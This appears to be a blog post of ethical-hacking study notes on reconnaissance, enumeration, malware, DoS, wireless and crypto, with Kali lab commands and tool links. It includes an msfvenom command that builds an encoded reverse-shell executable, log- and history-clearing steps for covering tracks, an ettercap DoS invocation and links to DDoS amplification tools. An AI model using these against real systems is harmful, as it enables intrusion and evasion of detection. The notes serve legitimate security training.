HOME LAB : HANDS-ON
- Get link
- X
- Other Apps
- Get link
- X
- Other Apps
Ethical Hacking Notes
Ethical hacking is the ability to identify vulnerabilities in an organization's network or infrastructure, and then address the issues to prevent incidents or attacks. Learn how to perform penetration testing and gain the knowledge and skills you need for a career in information security.
** attacks types
1. Passive
- Sniffing
- Port scanning
2. Active
- Release malware
- Launch DDoS
** Standards:
- PCI DSS
- HIPAA
- SOX
- GDPR
- COBIT framework
** Burst Attack or DoS
Reconnaissance - gather information about you.
3 Basics for a Org to contain cyber attack
1. Technical controls - Detect & Protect
2. Administrative
3. People
VLANS
NAT - N/w address translation
Spam filters, packet shapers & honey-spots
TOGAF - The Open Group Architecture Framework
ITIL - Information Technology Infrastructure Library
COBIT - Control Objectives for Information and Related Technology
SOX - Sarbanes-Oxley (SOX) act
SOX - section 301 & 404 = Indirectly deal with Information assurance and Data integrity
Penetration testing : can include N/w devices, email, hosts, wireless, applications, and websites.
FISMA - Federal Information Security Management Act
Vulnerability Scanning Tool
1. Tenable
Ethical Hacking
Means -
- what is derived from the information
- what can be planned to devise counter measures
Planned Five Phases approach
- Reconnaissance
- Scanning
- Gaining access
- Maintaining access
- Covering Tracks
******************************************************************************
Finding Information everywhere:-
Public resources - Websites, directories, email, job sites, Social websites.
Google Hacking database:
https://www.exploit-db.com/google-hacking-database
HTTrack Website Copier
https://www.httrack.com/
Montastic is free for open source software
https://www.montastic.com/
StatusOK
Monitor your Website and APIs from your computer. Get notified through Slack or E-mail when your server is down or response time is more than expected.
https://github.com/sanathp/statusok
https://www.shodan.io/
Shodan is the world's first search engine for Internet-connected devices.
Email Header look up
https://mxtoolbox.com/
Metagoofil is an information gathering tool designed for extracting metadata of public documents
https://www.kali.org/tools/metagoofil/
FOCA (Fingerprinting Organizations with Collected Archives)
https://github.com/ElevenPaths/FOCA
theHarvester : Use it for open source intelligence (OSINT) gathering to help determine a company's external threat landscape on the internet.
https://github.com/laramies/theHarvester
https://www.kali.org/tools/theharvester/
DMARC, which stands for “Domain-based Message Authentication, Reporting & Conformance”, is an email authentication, policy, and reporting protocol.
https://dmarc.org/
The Anti Hacker Alliance™ fights against Hackers
https://anti-hacker-alliance.com/
tracert google.com
pathping google.com
Network Tools: The Trusted Free Online
https://network-tools.com/
dig Command in Linux
https://www.geeksforgeeks.org/dig-command-in-linux-with-examples/
https://toolbox.googleapps.com/apps/main/
https://dnsdumpster.com/
https://who.is/
ip logger : can track geo location using ip logger URL
https://iplogger.org/
******************************************************************************
Ports 1 - 1023
21 FTP
22 SSH
53 Domain Name system
80 HTTP
88 Kerberos
Ports from 1024-49151 are registered
3389 - Remote desktop Protocol (RDP)
Vulnerability Scan
Firewall response in port scanning:
open means listening
Closed means denying
No reply means in stealth mode
Tools in Kali Linux:
Netcat and Nmap
DMitry
Curl
Armitage
Banner Grabbing: is done to get
operating system
Open ports and service running
To Prevent Banner Grabbing:
Mask or disable the web server
Hide file extensions on services
Disable unnecessary service
SSDP: Simple Service Discovery Protocol
https://www.spiceworks.com/free-network-monitoring-management-software/
NetworkMiner is an open source Network Forensic Analysis Tool (NFAT) for Windows (but also works in Linux / Mac OS X / FreeBSD). NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network.
https://www.netresec.com/?page=NetworkMiner
FING App : https://www.fing.com/products/fing-app
Net Scan by Nick Circelli
IP Tools: WiFi Analyzer by AmazingByte
Nikto :
Nikto is a free software command-line vulnerability scanner that scans webservers for dangerous files/CGIs, outdated server software and other problems.
https://www.kali.org/tools/nikto/
Staying anonymous:
1. Use private browsing
2. privacy badger
3. use password manager
4. use duckduck go
5. use VPN
6. temp email
Stay anonymous in Mobile
1. Don't use phone
2. don't use google
3. disable gps
4. use waze
Onion Routing TOR
1. Don't torrent
2. don't install or enable plugins
3. use only https
4. don't open documents
TOR flow network
https://torflow.uncharted.software/
Proxy Chain: Tools
1. Proxy swicher
2. Proxifier
3. Proxy workbench
Kali Linux:
sudo apt-get install tor
sudo apt-get install proxychains
SSH tunnels:
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
https://www.putty.org/
***************************************************************************
Enumeration is Identifying -
1. Username
2. System addresses
3. Network resources
4. Shares
5. Other targets
Before Vulnerable testing
- Extract usernames
- Gather host information via null sessions
- port enumeration
- user account enumeration
- special protocol enumeration
Approaches
- Local host enumeration
- remote host enumeration
- internet enumeration
- port and services enumeration
Useful service
Port 53 - DNS Domain Name System
Port 25 - SMTP Simple Mail transfer Protocol
Port 135 - RPC Remote Procedure calls
Port 139 - NetBIOS
Port 161 - SNMP simple network management Protocol
Port 389 - LDAP Lightweight Directory Protocol
Port 445 - SMB Server message Block
┌──(kali㉿kali)-[~]
└─$ echo $UID
┌──(kali㉿kali)-[~]
└─$ cat /etc/passwd |more
┌──(kali㉿kali)-[~]
└─$ sudo cat /etc/sudoers
┌──(kali㉿kali)-[~]
└─$ getent group sudo
How to run in root mode from User mode
┌──(kali㉿kali)-[~]
└─$ sudo su
┌──(root㉿kali)-[/home/kali]
└─# echo $UID
0
┌──(root㉿kali)-[/home/kali]
└─# Exit
┌──(kali㉿kali)-[~]
└─$
NetBIOS
NetBIOS name service - port 137 UDP
Datagram Distribution service - PORT 138 UDP
NetBIOS over TCP/IP - PORT 139 TCP
SMB
SAMBA is a linux implementation of SMB
DCE Distributed Computing Environment
RPC Remote Procedure Call
$ cat /proc/version
$ cat /etc/*-release
$ cat /proc/cpuinfo
$ df -a
$ df -h
$ cat /etc/shells
List of user names
$ cat /etc/passwd
Password with Hash
$ sudo cat /etc/shadow
$ pinky
$ w
$ who -a
Download PsTools:- https://docs.microsoft.com/en-us/sysinternals/downloads/pstools
Windows Terminal
Downloads> cd .\PSTools\
Downloads\PSTools> .\PsInfo.exe
Downloads\PSTools> .\PsInfo.exe -d
Downloads\PSTools> .\PsInfo.exe -s
Downloads\PSTools> .\pslist.exe
Downloads\PSTools> .\pslist.exe -t
Downloads\PSTools> .\pslist.exe -x
Downloads\PSTools> .\psloglist.exe -n 10
Downloads\PSTools> .\PsLoggedon.exe
Downloads\PSTools> .\PsService.exe
Downloads\PSTools> .\PsService.exe security Eventsystem
Downloads\PSTools> .\PsService.exe depend Eventsystem
Kali Linux :-
Getting details from metasploitable-2
smbmap -u '' -p '' -H 10.0.2.4 -R
sudo netstat -i
Get UDP open ports only
nmap -sU 10.0.2.4
Get TCP open ports only
nmap -PS 10.0.2.4
┌──(kali㉿kali)-[~]
└─$ nbtscan -h
┌──(kali㉿kali)-[~]
└─$ sudo nbtscan -v -s : 10.0.2.0/24
─$ sudo nbtscan -rv 10.0.2.0/24
┌──(kali㉿kali)-[~]
└─$ ls /usr/share/nmap/scripts
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script smb-os-discovery 10.0.2.4
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script smb-enum-users 10.0.2.4
┌──(kali㉿kali)-[~]
└─$ enum4linux -U 10.0.2.4
┌──(kali㉿kali)-[~]
└─$ enum4linux -S 10.0.2.4
┌──(kali㉿kali)-[~]
└─$ rpcclient -h
https://www.mitec.cz/netscan.html
https://www.softperfect.com/products/networkscanner/
https://www.ireasoning.com/mibbrowser.shtml
Understanding how to enumerate WMI is useful both for offensive and defensive activities.
┌──(kali㉿kali)-[~]
└─$ whatweb 10.0.2.4
┌──(kali㉿kali)-[~]
└─$ whatweb 10.0.2.0/24 --no-errors | grep -v Unassigned
┌──(kali㉿kali)-[~]
└─$ nikto -h 10.0.2.4
sudo apt install zaproxy
https://www.kali.org/tools/zaproxy/
https://www.kali.org/tools/gobuster/
┌──(kali㉿kali)-[~]
└─$ sudo traceroute -I 67.3.11.1
AWS has its own CLI (command line input)
https://www.netscantools.com/nstbasicmain.html
LDAP
https://sourceforge.net/projects/ldapadmin/
┌──(kali㉿kali)-[~]
└─$ telnet 10.0.2.4
Risk = Threats * Vulnerabilities
Vulnerabilities found in wild -> Unaware = Public + Vendor
Then after the period Vendor is aware -> Unaware = Public
Vendor released patches -> aware = Public
Network scanning
2 types
Information systems = DBMS, software
Information technologies = Hardware, n/w devices
How run Vul. scan
Unauthenticated scan = No user/pass, basic config, can miss many vuln.
Authenticated scan = clone environment system, valid user/pass, detailed scan
Baseline
Assess Vuln = Plan (compliance req.; Tools- Ports cans, n/w scans, web app scans.)
Assess Risk
Remediate = Mitigate the vuln.
Verify = retest
Monitor = continuous monitoring
Used to create VM of the entire system along with potential points and a list of possible attacks
Data Breach :
https://informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/#bysensitivity
Web-based User Feedback System
https://safecode.org/wp-content/uploads/2017/05/SAFECode_TM_Whitepaper.pdf
Using STRIDE, listed here are some of the threats possible against this system, organized by class of threat.
NIST SP 800-30, Page 78
https://www.nist.gov/privacy-framework/nist-sp-800-30
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
Each CVE has id and score is derived from metrics CVSS
Current CVSS Score Distribution For All Vulnerabilities
https://www.cvedetails.com/
https://www.cvedetails.com/vulnerability-list.php?vendor_id=0&product_id=0&version_id=0&page=22&hasexp=0&opdos=0&opec=1&opov=0&opcsrf=0&opgpriv=0&opsqli=0&opxss=0&opdirt=0&opmemc=0&ophttprs=0&opbyp=0&opfileinc=0&opginf=0&cvssscoremin=0&cvssscoremax=0&year=2022&cweid=0&order=2&trc=2105&sha=3ecb9c2942e59ed03bfff2cd27fb2aa98519a183
https://www.hacker101.com/start-here
https://ctf.hacker101.com/auth/login
https://www.hackerone.com/
https://www.osboxes.org/
Kali linux
https://www.mandiant.com/resources/commando-vm-windows-offensive-distribution
Github link:-
https://github.com/mandiant/commando-vm
┌──(kali㉿kali)-[~]
└─$ nslookup scanme.nmap.org
┌──(kali㉿kali)-[~]
└─$ nikto -h 45.33.32.156
A black box method that floods a system with inputs
Kali linux - OWASP ZAP
Defending the LAN
Man In The Middle Attack
ARP spoofing
MAC spoofing
Cisco Discovery Protocol Attack
VLAN hopping attack
DHCP attack
https://www.kali.org/tools/yersinia/
┌──(kali㉿kali)-[~]
└─$ sudo yersinia -G
Attacks can be launched from yersinia.
Monitoring Tools:
https://www.nagios.org/
https://www.tenable.com/products/nessus
https://www.gfi.com/
https://sectools.org/
Endpoint firewall examples- ZoneAlarm, ESET, and Norton Personal Firewall
Intrusion must learn the system, can monitor the host for suspicious activities
Examples- Symantec endpoint protection, McAfee host intrusion Prevention, Suricata.
https://help.eset.com/eis/15/en-US/
Hack a website Exercise:-
https://hbh.sh/home
***********************************************************************************************************APT Advanced persistent Threat
NTLM New Technology LAN Manager
Kerberos
PAM Pluggable Authentication Modules
SASL Simple Authentication and Security Layer
SAM Security Account Manager
Random Password Manager:-
https://www.passwordrandom.com/
Dictionary Attack
Brute Force Attack
Hybrid Attack
L0phtCrack 7.2.0 has been released as an open source project
https://gitlab.com/l0phtcrack/l0phtcrack/-/releases
Ophcrack is a free Windows password cracker based on rainbow tables.
https://ophcrack.sourceforge.io/
John the Ripper
Cain and Abel
Secure Hash Algorithms used for hashing the passwords
Rainbow crack:-
http://project-rainbowcrack.com/
Create the Hash format for password
https://www.fileformat.info/tool/hash.htm
Online Reverse Hash Lookup
http://reverse-hash-lookup.online-domain-tools.com/
http://www.md5.cz/
Horizontal
Vertical
Privilege escalation takes advantage of vulnerability and tries to gain administrator access.
https://trinityhome.org/
https://www.password-changer.com/index.html
simda bot free ip scanner
https://checkip.kaspersky.com/
Categories of Malware
Spyware
Viruses
Worms
Trojans
Rootkits
Adware
Block Third party cookies always
Spybot Identity Monitor is a simple program to monitor email addresses and usernames against the Have I Been Pwned database of leaked account information.
https://www.safer-networking.org/products/spybot-identity-monitor/
https://www.safer-networking.org/free-download/
https://www.elitekeyloggers.com/
Help Your Kids by Watching Their Back
https://www.refog.com/
non-profit foundation, creating free open-source macOS security tools, books, and the #OBTS conference
https://objective-see.org/
https://www.malwarebytes.com/keylogger
Creating Hidden content
desktop> notepad temp.txt:secret.txt
To display hidden content:-
desktop>more < temp.txt:secret.txt
Steganography Tools: these are obsolete
MP3Stego
S-Tools
OpenPuff
Local policies -> Audit Policy-> audit account logon events -> enable
For Linx: Metasploit meterpreter > clearev
Open log files stored in /var/log directory
In BackTrack: kwrite /var/log/messages
Erase command history
Export HISTSIZE=0
Open Event Logger and select clear log
Improve the windows startup service: Regedit: - Then delete unwanted register key - Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Computer\HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Computer\HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RpcSs
Zeus, also known as Zbot, is a kind of malware, referred to as a trojan, which can secretly install itself on your device.
Citadel (malware)
2 types
GUI interface
Configuration file
SpyEye Builder
FireCrypt
Trojan Development Kit - TDK
https://scholarworks.sjsu.edu/cgi/viewcontent.cgi?article=1513&context=etd_projects
is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.
https://attack.mitre.org/
IOC Indicator of Compromise
IOA Indicator of Attack
is a free community driven platform dedicated to providing the security community a way to share quality threat intelligence in a simple but efficient way.
IOC Bucket
OASIS OPEN:
https://www.oasis-open.org/
ADS Anomaly Detection System
Some enterprise products as examples
https://www.sonicwall.com/products/firewalls/
Malware That changes
Polymorphic
Metamorphic
Delivery via Phishing, via port 445 - configured for file sharing
Click on the each marware and get more information
Exploits using CVE-2019-2725/9
Dropper installs w32.sodin malware
Privilege escalation using CVE-2018-8453 & gains full system privileges
Encrypted Rootkill payload
GreyEnergy Malware
https://zeltser.com/mastering-4-stages-of-malware-analysis/
https://cuckoosandbox.org/
VirusShare.com is a repository of malware samples to provide security researchers, incident responders, forensic analysts, and the morbidly curious access to samples of live malicious code
https://virusshare.com/about
A source for packet capture (pcap) files and malware samples
https://www.malware-traffic-analysis.net/
This is a free malware analysis service for the community that detects and analyzes unknown threats using a unique Hybrid Analysis technology.
Encrypted Rootkill payload
Help file in Russian
It uses HTTP basic authentication as a password protection scheme to protect the botnet. Its configuration file enables a high level of customization of the denial-of-service attack, allowing the form of denial-of-service and the packet size and frequency to be configured. Its attacks include ICMP ping flooding, TCP SYN attacks, UDP flooding, HTTP GET request flooding, DNS flooding, and basic binary data flooding.
BlackEnergy 2
Kernel mode driver
Process injection
Privilege escalation based on ms08-025
BlackEnergy 3
2015 Ukraine power grid attacks
Then gave into GreyEnergy Malware
UPX is a free, portable, extendable, high-performance executable packer for several executable formats.
A software reverse engineering (SRE) suite of tools developed by NSA's Research Directorate in support of the Cybersecurity mission
***********************************************************************************************************
Tools
Wireshark
Npcap
Comes from nmap for windows along with wireshark.
Phases
Gather
Decode
Display
Analyze
Is the traffic normal
TCP flags
Malware Signatures
Traffic in clear text
Router advertisements
Denial of Service DoS
Buffer overflow
Password attack
2 basic types of ethernet environments
Shared or hub based
Switched network
Wireless
802.11b/g/n act like a hub
IPv4 Vs IPv6
┌──(kali㉿kali)-[~]
└─$ sudo macof
STP = Spanning Tree Protocol
Attacks
DoS using BPDU Flood
CDP = Cisco Discovery Protocol
Attacks
Send bogus CDP to other devices
Flood CDP & cause a DoS
DTP
DHCP
HRSP
ISL
VTP
802.1Q
802.1X
Use switch port security
Used in Man-in-the-middle attack
Use Filtering trusted IP & MAC address
DHCP process
Discover
Offer
Request
Acknowledge
VLAN Access Control List VACL
Access control on the switch not the router
Tool in Kali Linux
Used in man in the middle attack
┌──(kali㉿kali)-[~]
└─$ ettercap -G
Old websites
AsecuritySite:https://asecuritysite.com/ids
To prevent DNS attacks
Enable Cache locking
Tools
Linux Tools
Tcpdump
Ettercap
Dsniff
***********************************************************************************************************
Phone phishing
Online recon
Dumpster diving
Shoulder surfing
Simple persuasion
Poses as love interest
Lures you into a relationship
Privacy most important
TOR browser
Extensions or Addons
Auto update enabled
Use of social platform
Identification Theft
Phishing emails
Dangerous websites
Fake Call
Download the toolkit or use with kali linux
SET - Crafts the bait
Metasploit - creates the exploit
The Social-Engineer Toolkit (SET) - TrustedSec
https://www.trustedsec.com/
https://www.spamhaus.org/statistics/spammers/
https://www.fileshredder.org/
Tools
https://www.digitalattackmap.com/
DoS
DDoS
TCP SYN flood
Smurf (ICMP) flood
UDP flood
ARP flood
DNS reflection
De-authentication
Routing congestion
HTTP services
FTP service
SIP services
┌──(kali㉿kali)-[~]
└─$ hping3 -h
HPing3 Cheatsheet ≈ Packet Storm
https://packetstormsecurity.com/files/97414/HPing3-Cheatsheet.html
https://dl.packetstormsecurity.net/papers/general/hping3_cheatsheet_v1.0-ENG.pdf
https://github.com/r-richter/hyenae
Hyenae is a highly flexible platform independent network packet generator. It allows you to reproduce several MITM, DoS and DDoS attack scenarios, comes with a clusterable remote daemon and an interactive attack assistant.
https://github.com/NewEraCracker/LOIC
https://sourceforge.net/projects/loic/
┌──(kali㉿kali)-[~]
└─$ ettercap -P list
Ettercap -TQP dos_attack
Ettercap -G
┌──(kali㉿kali)-[~]
└─$ service --status-all | more
Denial of service using NTP servers to amplify attacks
It appears someone is using an attack vector like this to DDOS CloudFlare
https://github.com/vpnguy-zz/ntpdos
GitHub - vpnguy-zz/ntpdos: Create a DDOS attack using NTP servers
Free & open source, high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.
https://memcached.org/
This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io
https://github.com/649/Memcrashed-DDoS-Exploit
GitHub - 649/Memcrashed-DDoS-Exploit: DDoS attack tool for sending forged UDP packets to vulnerable Memcached servers obtained using Shodan API
https://www.aircrack-ng.org/doku.php?id=airmon-ng
┌──(kali㉿kali)-[~]
└─$ sudo airmon-ng
https://www.kali.org/tools/goldeneye/
GoldenEye is a HTTP DoS Test Tool. This tool can be used to test if a site is susceptible to Deny of Service (DoS) attacks. Is possible to open several parallel connections against a URL to check if the web server can be compromised.
https://owasp.org/www-project-top-ten/
Distributed by botnets
Drops randomly generated name
Inserts startup command into registry
Post Encryption
Ransom Message displayed
Countdown timer started
If payment not received, files are deleted
Paying Ransom
Payment of the ransom is made using bitcoins.
Other variants use alternative anonymous payment methods, such as U.CASH, CASHU, or prepaid cash money cards.
Once the victim pays the ransom, a transaction ID is provided.
The victim can then enter this into the Cryptolocker program that is running.
The private key is then sent to the victim, and the decryption process begins.
Priority based servicing
Priority Management
Discard low priority
Aggregate based congestion control [ACC]
Egress filtering
Packet inspection
Detect bad packets
Ingress filtering
Malicious packet detection
NEtwork context
IP address verification
Source address spoofing
Real Time detection
Real time traceback
Rate limiting
ACLs
Detecting known malicious threats
Characterizing normal
Metrics to reflect normal boundaries
Detecting traffic anomalies
is an open-source, RESTful, middleware platform that transparently integrates with your existing infrastructure. Repose provides highly scalable and extensible solutions to API processing tasks such as authentication, rate limiting, API validation, HTTP request logging, and much more.
https://repose.atlassian.net/wiki/spaces/REPOSE/overview
Project Shield, created by Google Cloud and Jigsaw and powered by Google Cloud Armor, provides free unlimited protection against DDoS attacks, a type of digital attack used to censor information by taking websites offline
https://projectshield.withgoogle.com/landing
https://github.com/pratiknarang/peershark
https://ieeexplore.ieee.org/document/9642767
https://www.ieee-security.org/TC/SPW2014/papers/5103a108.PDF
Resilient Interdomain Traffic Exchange:
BGP Security and DDoS Mitigation
https://csrc.nist.gov/publications/detail/sp/800-189/final
Resilient Interdomain Traffic Exchange: BGP Security and DDoS Mitigation
39 control plane and BGP security recommendations
26 DDoS mitigation recommendations
12 recommendations for source address validations
7 recommendations for port Filtering
1 recommendations on rate limiting
6 recommendations on flow specification blackholing
Stateless HTTP
Session IDs
PHP session array
http://websocketd.com/
https://github.com/joewalnes/websocketd
Web proxy
ARP poisoning
Malicious Wifi
https://www.tampermonkey.net/
https://chrome.google.com/webstore/detail/tampermonkey/dhdgffkkebhmkfjojejmpbldmpobfkfo?hl=en
https://github.com/Subterfuge-Framework/Subterfuge
https://sectools.org/tool/cain/
https://www.putty.org/
Hijack Putty sessions in order to sniff conversation and inject Linux commands.
https://github.com/seastorm/PuttyRider
UDP 5554- telemetry data
TCP 5555- streaming video
UDP 5556- flight commands
UDP 5559- critical data
https://www.acrylicwifi.com/en/wlan-wifi-wireless-network-software-tools/wlan-scanner-acrylic-wifi-free/
Telnet connection
Add firewall rule
Laptop application to control drone
2.4GHz radio control link
XBee telemetry link
5.8GHz streaming video link
Detect all ZigBee station
Delete the mac address and set attackers mac address
Pair victim with attacker
Windows Defender Firewall Properties
Public Profile
Inbound connections = Block all connections
Settings-> Customize -> allow unicast response = No {to safe from defense performance mark as NO}
Logging->Customize->
Log Dropped packets = Yes
Log Successful connections = yes
https://support.moonpoint.com/reviews/software/windows/network/dns/WDLA/
┌──(kali㉿kali)-[~]
└─$ sudo iptables -L -n -v
┌──(kali㉿kali)-[~]
└─$ cat /var/log/kern.log
GNS3 : https://www.gns3.com/
All in one:-
https://github.com/GNS3/gns3-gui/releases
Tour of GN3
Basic operation
Routed network
ASA secure enclave
Target to lure attackers
Identify and prosecute
Monitor and analyze
Types of honey pots
Low interaction
High interaction
Honeynets
sinkhole
https://www.honeynet.org/projects/
This page contains a list of tools and services that we use on a regular basis. Most of these tools have been created by our members and participating GSoc students, but some are also external and not affiliated with the Honeynet Project. We hope you find the below link collection useful.
Blacklist the websites
Whitlist
Just add the sites to be allowed
This is easier than maintaining the blacklist
Log and Alert output
alert_fast
alert_full
Default file /var/logs/snort/
alert_syslog
Suricata is the leading independent open source threat detection engine. By combining intrusion detection (IDS), intrusion prevention (IPS), network security monitoring (NSM) and PCAP processing, Suricata can quickly identify, stop, and assess even the most sophisticated attacks.
Security Onion Solutions, LLC is the creator and maintainer of Security Onion, a free and open platform for threat hunting, network security monitoring, and log management. Security Onion includes best-of-breed free and open tools including Suricata, Zeek, Wazuh, the Elastic Stack and many others.
https://securityonionsolutions.com/
┌──(kali㉿kali)-[~]
└─$ msfvenom --list encoders
Msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 LHOST=10.0.2.15 LPORT=4444 -e x86/shikata_ga_nai -i 100 -f exe -o venom.exe
Andromeda's Five Star Custom Packer – Hackers' Tactics Analyzed
Packer-based malware is malware which is modified in the runtime memory using different and sophisticated compression techniques. Such malware is hard to detect by known malware scanners and anti-virus solutions. In addition, it is a cheap way for hackers to recreate new signatures for the same malware on the fly simply by changing the encryption/packing method. Packers themselves are not malware; attackers use this tactic to obfuscate the code’s real intention.
https://blog.morphisec.com/andromeda-tactics-analyzed
Return Code from web servers
200 - processed OK
400 - bad request
403 - unauthorized
404 - not found
500 - internal server error
https://www.kali.org/tools/burpsuite/
Testing vulnerable website
http://zero.webappsecurity.com/
https://owasp.org/www-project-webgoat/
┌──(kali㉿kali)-[~]
└─$ whatweb http://zero.webappsecurity.com
http://zero.webappsecurity.com [200 OK] Apache, Bootstrap, Content-Language[en-US], Country[UNITED STATES][US], HTML5, HTTPServer[Apache-Coyote/1.1], IP, JQuery[1.8.2], Script[text/javascript], Title[Zero - Personal Banking - Loans - Credit Cards], UncommonHeaders[access-control-allow-origin], X-UA-Compatible[IE=Edge]
┌──(kali㉿kali)-[~]
└─$ whatweb -l | more
Web Security Dojo
A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo
https://www.mavensecurity.com/resources/web-security-dojo
***********************************************************************************************************Network key
Internet login
MAC filtering
Encryption- WEP, WPA, and WPA2
Connection -WPS
Performance in dBi is against a benchmark
Gain is expressed in units of dBi, decibels isotropic, and the higher the decibels, the more powerful the antenna, and the more reliable the communication is. Sometimes performance will be expressed as dBm, which is pure signal power. dBm are related to milliwatts through the equation dBm equals 10 times log to the 10 milliwatts.
When transmitting, a positive number represents better performance, or gain, from the benchmark, and a negative number means lower performance, or loss. 1,000 milliwatts, or 30 dBm, is rated to be a good transmitter.
For reception, the opposite is true. We want to be able to receive weaker signals, and a good antenna should be able to operate down to about minus 90 dBm.
https://www.kali.org/tools/wifite/
https://www.kali.org/tools/reaver/
Reaver
Wash
https://www.aircrack-ng.org/doku.php?id=airmon-ng
https://wpa3.mathyvanhoef.com/
WiFi Pineapple - Hak5
fern
https://www.kali.org/tools/fern-wifi-cracker/
https://www.metageek.com/inssider/
https://www.kali.org/tools/fern-wifi-cracker/
Serial Port Profile SPP
Human interface Device Profile HID
Hands-Free Profile HFP
Advanced Audio Distribution Profile A2DP
Audio/Video Remote control Profile AVRCP
┌──(kali㉿kali)-[~]
└─$ lsusb
┌──(kali㉿kali)-[~]
└─$ sudo bluelog -l
┌──(kali㉿kali)-[~]
└─$ btscanner
┌──(kali㉿kali)-[~]
└─$ fang -h
***********************************************************************************************************
OWASP Mobile Security methodologies
Effective testing
Static analysis
App source code
Reverse Engg.
Clone runtime environment
Identify
All N/w interfaces
N/W protocols
Complements interactions
Data access
App interfaces
Encryption
Pinning
Certificate
Public key
Dynamic analysis
Changes to device storage
Info transmitted
Web app testing
Forensic analysis
Virtualization
OWASP flagship project provides a security standard for mobile apps (OWASP MASVS) and a comprehensive testing guide (OWASP MSTG) that covers the processes, techniques, and tools used during a mobile app security test, as well as an exhaustive set of test cases that enables testers to deliver consistent and complete results.
https://owasp.org/www-project-mobile-security-testing-guide/
Builds on the Linux security model
“*.dex” extensions are Dalvik executable files.
https://developer.android.com/studio
https://ibotpeaches.github.io/Apktool/
https://www.apkfiles.com/
https://sourceforge.net/projects/dex2jar/
https://www.kali.org/tools/dex2jar/
https://github.com/skylot/jadx
The OWASP Security Shepherd Project is a web and mobile application security training platform. Security Shepherd has been designed to foster and improve security awareness among a varied skill-set demographic. The aim of this project is to take AppSec novices or experienced engineers and sharpen their penetration testing skill set to security expert status.
https://owasp.org/www-project-security-shepherd/
***********************************************************************************************************
Lack of security
Vulnerable interfaces
Lack of firmware updates
https://owasp.org/www-project-internet-of-things/
https://wiki.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Top_10
DDoS
Rolling code attack
BlueBorne attack
Jamming attacks
Backdoor
Sybil
Side channel
Information gathering
Vulnerability scanning
Launch attack
Gain access
Maintain access
Symmetric Cryptography
Asymmetric
Hashing
Plaintext
Block
Stream
Replaced by AES
Symmetric
Designed by Ron Rivest
RC4
RC5
RC6
Symmetric & Asymmetric combined together
One way function
Used in passwords
128-bit o/p
160-bit o/p
Authorized Agency Verification
CA - Certificate authority verification
Digital Certificate X.509
Version
Serial no
Algorithm ID
Issuer
Validity
DSA - Digital Signature Algorithm
Certificate management system
Digital certificate
CRL - certification revocation list
CA - certificate authority
RA registration authority
Enduser
S/MIME - Secure MIME - added digital signature, public key encryption to emails
PGP - Pretty good privacy - similar to PKI
SSH - secure shell - encrypted channels for remote command for a system.
Distributed.net
Electronic Frontier Foundation EFF
Electronic Frontier Foundation
https://www.eff.org
HEARTbleed
https://heartbleed.com/
Poodlebleed "Padding Oracle On Downgraded Legacy Encryption"
DROWN - Decrypting RSA with Obsolete and Weakened eNcryption
https://drownattack.com/
FREAK ("Factoring RSA Export Keys")
XaaS
SaaS
PaaS
IaaS
MFA Multi Factor Authentication
RBAC Role-Based Access Control
Business Continuity and Risk Management
Identify assets
Identify assets threats
Identify threat likelihood
Data Replication
Application Resiliency
GDPR General Data Protection Regulation
PCI DSS - Payment Card Industry Data Security
***********************************************************************************************************
OWASP Security Shepherd
-https://owasp.org/www-project-security-shepherd/
┌──(kali㉿kali)-[~]
└─$ service mysql start
┌──(kali㉿kali)-[~]
└─$ sudo mysql -u root -p
MariaDB [(none)]> show databases;
MariaDB [(none)]> use information_schema;
MariaDB [information_schema]> show tables;
MariaDB [information_schema]> use mysql
MariaDB [mysql]> show database;
MariaDB [mysql]> show tables;
MariaDB [mysql]> show columns from user;
MariaDB [mysql]> select user,password from user;
***********************************************************************************************************
Comments
Post a Comment